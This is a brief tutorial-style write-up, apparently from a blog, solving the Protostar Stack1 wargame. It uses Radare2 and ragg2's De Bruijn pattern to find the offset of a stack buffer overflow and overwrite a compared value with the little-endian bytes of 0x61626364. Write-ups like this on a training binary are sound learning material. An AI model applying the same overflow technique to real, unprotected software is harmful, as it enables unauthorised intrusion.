2017, Dec 18

Exploiting Protostar Stack1

You can check previous problems here :

Problem source code

We will work in this problem as we do not have the C source code

As you can clearly see, our binary is a 32bit ELF file, not stripped, the file isn’t protected with canaries , pic, nx or relro.

Let’s have a look on what’s happening inside the app

We will start the app inside Radare2 and have a look in Visual Mode to try understanding how it’s working

So this is the key line cmp eax, 0x61626364, so our main Goal is to override \$eax with 0x61626364

Now we’ll use a tool in radare’s framework called ragg2, which allows us to generate a cyclic pattern called De Bruijn Sequence and check the exact offset where our payload overrides the buffer.

• ood ! cat payload.txt: reopen in debugger mode (with args)

In visual mode you can move step by step using S untill you reach the line before cmp eax, 0x61626364

Now let’s rewrite our payload and exploit the binary ** Notice that we are working with a little indean so 0x61626364 will be \x64\x63\x62\x61 (Reversed)

And we did it ;)